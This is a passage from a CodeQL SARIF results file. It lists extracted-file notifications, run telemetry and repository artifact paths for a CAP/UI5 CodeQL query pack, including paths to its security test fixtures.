d":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/self-parser.test.ts","uriBaseId":"%SRCROOT%","index":79}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/graph.test.ts","uriBaseId":"%SRCROOT%","index":69}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/environment.test.ts","uriBaseId":"%SRCROOT%","index":83}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/versionResolver.test.ts","uriBaseId":"%SRCROOT%","index":93}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/environment.ts","uriBaseId":"%SRCROOT%","index":53}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/version.ts","uriBaseId":"%SRCROOT%","index":45}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/versionResolver.ts","uriBaseId":"%SRCROOT%","index":63}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/types.test.ts","uriBaseId":"%SRCROOT%","index":92}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/cacheInstaller.ts","uriBaseId":"%SRCROOT%","index":59}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/functions.ts","uriBaseId":"%SRCROOT%","index":46}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/filesystem.ts","uriBaseId":"%SRCROOT%","index":54}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/codeql.test.ts","uriBaseId":"%SRCROOT%","index":81}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/filesystem.test.ts","uriBaseId":"%SRCROOT%","index":84}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"scripts/CreateTestsFromYaml.py","uriBaseId":"%SRCROOT%","index":615}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/python","index":3},"properties":{"formattedMessage":{"text":""}}},{"message":{"text":"On the Linux (amd64; 6.11.0-1018-azure) platform.","markdown":"On the Linux (amd64; 6.11.0-1018-azure) platform."},"level":"none","timeUtc":"2025-12-15T19:16:21.521110429Z","descriptor":{"id":"cli/platform","index":4},"properties":{"attributes":{"arch":"amd64","name":"Linux","version":"6.11.0-1018-azure"},"visibility":{"statusPage":false,"telemetry":true}}},{"message":{"text":""},"level":"none","timeUtc":"2025-12-15T19:16:14.851Z","descriptor":{"id":"codeql-action/bundle-download-telemetry","index":5},"properties":{"attributes":{"combinedDurationMs":13239,"compressionMethod":"gzip","downloadDurationMs":2909,"extractionDurationMs":10330,"streamExtraction":false,"toolsUrl":"https://github.com/github/codeql-action/releases/download/codeql-bundle-v2.23.8/codeql-bundle-linux64.tar.gz"},"visibility":{"statusPage":false,"telemetry":true}}}],"executionSuccessful":true}],"artifacts":[{"location":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2}},{"location":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/codeStyles/Project.xml","uriBaseId":"%SRCROOT%","index":4}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/inspectionProfiles/Project_Default.xml","uriBaseId":"%SRCROOT%","index":5}},{"location":{"uri":".cds-extractor-cache/cds-419af57a6ca03c33e081f24fe025fd9562eb8de8ad926dd10c59ce86d3bfee92/node_modules/@sap/cds-dk/node_modules/xml-js/bin/test.xml","uriBaseId":"%SRCROOT%","index":6}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/codeStyles/codeStyleConfig.xml","uriBaseId":"%SRCROOT%","index":7}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/modules.xml","uriBaseId":"%SRCROOT%","index":8}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/vcs.xml","uriBaseId":"%SRCROOT%","index":9}},{"location":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/xml-js/bin/test.xml","uriBaseId":"%SRCROOT%","index":10}},{"location":{"uri":".github/codeql/codeql-config.yaml","uriBaseId":"%SRCROOT%","index":11}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":12}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":13}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml","uriBaseId":"%SRCROOT%","index":14}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":15}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":16}},{"location":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/xsjs.model.yml","uriBaseId":"%SRCROOT%","index":17}},{"location":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml","uriBaseId":"%SRCROOT%","index":18}},{"location":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":19}},{"location":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":20}},{"location":{"uri":".github/workflows/cds-extractor-dist-bundle.yml","uriBaseId":"%SRCROOT%","index":21}},{"location":{"uri":".github/workflows/code_scanning.yml","uriBaseId":"%SRCROOT%","index":22}},{"location":{"uri":".github/workflows/codeql-ql.yml","uriBaseId":"%SRCROOT%","index":23}},{"location":{"uri":".github/workflows/run-codeql-unit-tests-javascript.yml","uriBaseId":"%SRCROOT%","index":24}},{"location":{"uri":".github/workflows/update-codeql.yml","uriBaseId":"%SRCROOT%","index":25}},{"location":{"uri":"cds-extractor-marker.js","uriBaseId":"%SRCROOT%","index":26}},{"location":{"uri":"codeql-workspace.yml","uriBaseId":"%SRCROOT%","index":27}},{"location":{"uri":"extractors/cds/codeql-extractor.yml","uriBaseId":"%SRCROOT%","index":28}},{"location":{"uri":"extractors/cds/tools/.prettierrc.js","uriBaseId":"%SRCROOT%","index":29}},{"location":{"uri":"extractors/cds/tools/cds-extractor.ts","uriBaseId":"%SRCROOT%","index":30}},{"location":{"uri":"extractors/cds/tools/dist/cds-extractor.bundle.js","uriBaseId":"%SRCROOT%","index":31}},{"location":{"uri":"extractors/cds/tools/esbuild.config.mjs","uriBaseId":"%SRCROOT%","index":32}},{"location":{"uri":"extractors/cds/tools/eslint.config.mjs","uriBaseId":"%SRCROOT%","index":33}},{"location":{"uri":"extractors/cds/tools/jest.config.js","uriBaseId":"%SRCROOT%","index":34}},{"location":{"uri":"extractors/cds/tools/package-lock.json","uriBaseId":"%SRCROOT%","index":35}},{"location":{"uri":"extractors/cds/tools/package.json","uriBaseId":"%SRCROOT%","index":36}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/command.ts","uriBaseId":"%SRCROOT%","index":37}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/compile.ts","uriBaseId":"%SRCROOT%","index":38}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/graph.ts","uriBaseId":"%SRCROOT%","index":39}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/index.ts","uriBaseId":"%SRCROOT%","index":40}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/project.ts","uriBaseId":"%SRCROOT%","index":41}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/retry.ts","uriBaseId":"%SRCROOT%","index":42}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/types.ts","uriBaseId":"%SRCROOT%","index":43}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/validator.ts","uriBaseId":"%SRCROOT%","index":44}},{"location":{"uri":"extractors/cds/tools/src/cds/compiler/version.ts","uriBaseId":"%SRCROOT%","index":45}},{"location":{"uri":"extractors/cds/tools/src/cds/parser/functions.ts","uriBaseId":"%SRCROOT%","index":46}},{"location":{"uri":"extractors/cds/tools/src/cds/parser/graph.ts","uriBaseId":"%SRCROOT%","index":47}},{"location":{"uri":"extractors/cds/tools/src/cds/parser/index.ts","uriBaseId":"%SRCROOT%","index":48}},{"location":{"uri":"extractors/cds/tools/src/cds/parser/types.ts","uriBaseId":"%SRCROOT%","index":49}},{"location":{"uri":"extractors/cds/tools/src/codeql.ts","uriBaseId":"%SRCROOT%","index":50}},{"location":{"uri":"extractors/cds/tools/src/constants.ts","uriBaseId":"%SRCROOT%","index":51}},{"location":{"uri":"extractors/cds/tools/src/diagnostics.ts","uriBaseId":"%SRCROOT%","index":52}},{"location":{"uri":"extractors/cds/tools/src/environment.ts","uriBaseId":"%SRCROOT%","index":53}},{"location":{"uri":"extractors/cds/tools/src/filesystem.ts","uriBaseId":"%SRCROOT%","index":54}},{"location":{"uri":"extractors/cds/tools/src/logging/cdsExtractorLog.ts","uriBaseId":"%SRCROOT%","index":55}},{"location":{"uri":"extractors/cds/tools/src/logging/index.ts","uriBaseId":"%SRCROOT%","index":56}},{"location":{"uri":"extractors/cds/tools/src/logging/statusReport.ts","uriBaseId":"%SRCROOT%","index":57}},{"location":{"uri":"extractors/cds/tools/src/logging/types.ts","uriBaseId":"%SRCROOT%","index":58}},{"location":{"uri":"extractors/cds/tools/src/packageManager/cacheInstaller.ts","uriBaseId":"%SRCROOT%","index":59}},{"location":{"uri":"extractors/cds/tools/src/packageManager/index.ts","uriBaseId":"%SRCROOT%","index":60}},{"location":{"uri":"extractors/cds/tools/src/packageManager/projectInstaller.ts","uriBaseId":"%SRCROOT%","index":61}},{"location":{"uri":"extractors/cds/tools/src/packageManager/types.ts","uriBaseId":"%SRCROOT%","index":62}},{"location":{"uri":"extractors/cds/tools/src/packageManager/versionResolver.ts","uriBaseId":"%SRCROOT%","index":63}},{"location":{"uri":"extractors/cds/tools/src/utils.ts","uriBaseId":"%SRCROOT%","index":64}},{"location":{"uri":"extractors/cds/tools/test/cds-extractor.test.ts","uriBaseId":"%SRCROOT%","index":65}},{"location":{"uri":"extractors/cds/tools/test/jest.setup.ts","uriBaseId":"%SRCROOT%","index":66}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/command.test.ts","uriBaseId":"%SRCROOT%","index":67}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/compile.test.ts","uriBaseId":"%SRCROOT%","index":68}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/graph.test.ts","uriBaseId":"%SRCROOT%","index":69}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/index.test.ts","uriBaseId":"%SRCROOT%","index":70}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/project.test.ts","uriBaseId":"%SRCROOT%","index":71}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/retry.test.ts","uriBaseId":"%SRCROOT%","index":72}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/validator.test.ts","uriBaseId":"%SRCROOT%","index":73}},{"location":{"uri":"extractors/cds/tools/test/src/cds/compiler/version.test.ts","uriBaseId":"%SRCROOT%","index":74}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/build-graph.test.ts","uriBaseId":"%SRCROOT%","index":75}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/files-to-compile.test.ts","uriBaseId":"%SRCROOT%","index":76}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/monorepo-support.test.ts","uriBaseId":"%SRCROOT%","index":77}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/project-aware-compilation.test.ts","uriBaseId":"%SRCROOT%","index":78}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/self-parser.test.ts","uriBaseId":"%SRCROOT%","index":79}},{"location":{"uri":"extractors/cds/tools/test/src/cds/parser/subdirectory-detection.test.ts","uriBaseId":"%SRCROOT%","index":80}},{"location":{"uri":"extractors/cds/tools/test/src/codeql.test.ts","uriBaseId":"%SRCROOT%","index":81}},{"location":{"uri":"extractors/cds/tools/test/src/diagnostics.test.ts","uriBaseId":"%SRCROOT%","index":82}},{"location":{"uri":"extractors/cds/tools/test/src/environment.test.ts","uriBaseId":"%SRCROOT%","index":83}},{"location":{"uri":"extractors/cds/tools/test/src/filesystem.test.ts","uriBaseId":"%SRCROOT%","index":84}},{"location":{"uri":"extractors/cds/tools/test/src/logging/cdsExtractorLog.test.ts","uriBaseId":"%SRCROOT%","index":85}},{"location":{"uri":"extractors/cds/tools/test/src/logging/performanceTrackingIntegration.test.ts","uriBaseId":"%SRCROOT%","index":86}},{"location":{"uri":"extractors/cds/tools/test/src/logging/statusReport.test.ts","uriBaseId":"%SRCROOT%","index":87}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/cacheInstaller.test.ts","uriBaseId":"%SRCROOT%","index":88}},{"location":{"uri":"extractors/cds/tools/test/src/logging/types.test.ts","uriBaseId":"%SRCROOT%","index":89}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/index.test.ts","uriBaseId":"%SRCROOT%","index":90}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/projectInstaller.test.ts","uriBaseId":"%SRCROOT%","index":91}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/types.test.ts","uriBaseId":"%SRCROOT%","index":92}},{"location":{"uri":"extractors/cds/tools/test/src/packageManager/versionResolver.test.ts","uriBaseId":"%SRCROOT%","index":93}},{"location":{"uri":"extractors/cds/tools/test/src/utils.test.ts","uriBaseId":"%SRCROOT%","index":94}},{"location":{"uri":"extractors/cds/tools/tsconfig.json","uriBaseId":"%SRCROOT%","index":95}},{"location":{"uri":"extractors/cds/tools/validate-bundle.js","uriBaseId":"%SRCROOT%","index":96}},{"location":{"uri":"javascript/frameworks/cap/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":97}},{"location":{"uri":"javascript/frameworks/cap/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":98}},{"location":{"uri":"javascript/frameworks/cap/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":99}},{"location":{"uri":"javascript/frameworks/cap/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":100}},{"location":{"uri":"javascript/frameworks/cap/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":101}},{"location":{"uri":"javascript/frameworks/cap/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":102}},{"location":{"uri":"javascript/frameworks/cap/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":103}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":104}},{"location":{"uri":"javascript/frameworks/cap/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":105}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":106}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json","uriBaseId":"%SRCROOT%","index":107}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js","uriBaseId":"%SRCROOT%","index":108}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":109}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":110}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":111}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":112}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds","uriBaseId":"%SRCROOT%","index":113}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":114}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":115}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.js","uriBaseId":"%SRCROOT%","index":116}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json","uriBaseId":"%SRCROOT%","index":117}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js","uriBaseId":"%SRCROOT%","index":118}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":119}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":120}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":121}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":122}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds","uriBaseId":"%SRCROOT%","index":123}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/model.cds.json","uriBaseId":"%SRCROOT%","index":124}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/server.js","uriBaseId":"%SRCROOT%","index":125}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/package.json","uriBaseId":"%SRCROOT%","index":126}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds","uriBaseId":"%SRCROOT%","index":127}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.js","uriBaseId":"%SRCROOT%","index":128}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.cds","uriBaseId":"%SRCROOT%","index":129}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.js","uriBaseId":"%SRCROOT%","index":130}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":131}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":132}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json","uriBaseId":"%SRCROOT%","index":133}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js","uriBaseId":"%SRCROOT%","index":134}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":135}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":136}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":137}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":138}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds","uriBaseId":"%SRCROOT%","index":139}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/model.cds.json","uriBaseId":"%SRCROOT%","index":140}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json","uriBaseId":"%SRCROOT%","index":141}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js","uriBaseId":"%SRCROOT%","index":142}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds","uriBaseId":"%SRCROOT%","index":143}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js","uriBaseId":"%SRCROOT%","index":144}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds","uriBaseId":"%SRCROOT%","index":145}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js","uriBaseId":"%SRCROOT%","index":146}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds","uriBaseId":"%SRCROOT%","index":147}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/model.cds.json","uriBaseId":"%SRCROOT%","index":148}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/package-lock.json","uriBaseId":"%SRCROOT%","index":149}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/package.json","uriBaseId":"%SRCROOT%","index":150}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/server.js","uriBaseId":"%SRCROOT%","index":151}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/privileged-user.js","uriBaseId":"%SRCROOT%","index":152}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":153}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":154}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":157}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":158}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js","uriBaseId":"%SRCROOT%","index":160}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":161}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":162}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":163}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":164}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":165}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":166}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json","uriBaseId":"%SRCROOT%","index":167}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js","uriBaseId":"%SRCROOT%","index":168}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":169}},{"location":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":170}},{"location":{"uri":"javascript/frameworks/c